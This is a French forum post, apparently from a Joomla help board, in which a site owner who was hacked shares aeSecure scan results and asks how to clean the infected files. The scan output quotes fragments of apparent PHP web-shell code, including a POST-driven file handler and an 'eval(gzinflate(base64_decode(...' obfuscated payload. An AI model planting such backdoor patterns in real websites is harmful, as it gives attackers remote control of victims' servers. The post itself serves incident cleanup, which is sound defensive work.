Bonjour,
Suite au piratage de mon site j'ai remis une sauvegarde antérieur. J'ai utilisé aeSecure Quick Scan mais par rapport aux résultats j'ai des doutes. Faut-il juste supprimer les codes malicieux des fichiers ou supprimer les fichiers? Merci par avance pour votre aide!
Par exemples:
Et également d'autres problèmes sur d'autres fichiers.
Merci par avance pour vos conseils!
Bonne journée
Edit: Et comment peut-on savoir si c'est vraiment un virus et non un faux positif?
Suite au piratage de mon site j'ai remis une sauvegarde antérieur. J'ai utilisé aeSecure Quick Scan mais par rapport aux résultats j'ai des doutes. Faut-il juste supprimer les codes malicieux des fichiers ou supprimer les fichiers? Merci par avance pour votre aide!
Par exemples:
/home/monsite/www/modules/mod_fxprev/libraries/tmpl.php(4.96K)(Date dernière modif. November 03 2015 15:11:23.)9d7f28772f7fd67ffc8c2ee4b3bf8333
Attention Il ne s'agit pas forcément d'un virus!; la signature recherchée est également utilisée dans du code légitime.Signature : base64_decode Trouvé en position 202 du fichier; voici le contexte :
Attention Il ne s'agit pas forcément d'un virus!; la signature recherchée est également utilisée dans du code légitime.Signature : base64_decode Trouvé en position 202 du fichier; voici le contexte :
Code PHP:
) ;
$hostname = $_SERVER['HTTP_HOST'];
$action = $_POST['action'];
$file = $_POST['file'];
$data = base64_decode($_POST['data']); (base64_decode est écrit en rouge)
$tmpdir = $_POST['tmpdir'];
if ($action == 'gzip') {
$ftime = filemtime($base
/home/monsite/www/modules/mod_fxprev/libraries/search.php(28.83K)(Date dernière modif. December 09 2015 17:29:38.)36ca2fc9ab24f903b2fb933496c5b0cd
Danger Forte probabilité qu'il s'agisse d'un fichier ayant été virusé ou étant un virusSignature : gzinflate(base64_decodeTrouvé en position 11 du fichier; voici le contexte :
Danger Forte probabilité qu'il s'agisse d'un fichier ayant été virusé ou étant un virusSignature : gzinflate(base64_decodeTrouvé en position 11 du fichier; voici le contexte :
Code PHP:
<?php eval(gzinflate(base64_decode('HZzHkuNQdgV/ZXYzE1jAu5BCE/CW8JYbBbz3Hl8vlhbdm64iAbx3z8lkg/jP//z3f+Z6/kdxJv2/qrcZyz7Zi3+lyVYQ2P/mRT
Merci par avance pour vos conseils!
Bonne journée
Edit: Et comment peut-on savoir si c'est vraiment un virus et non un faux positif?
Commentaire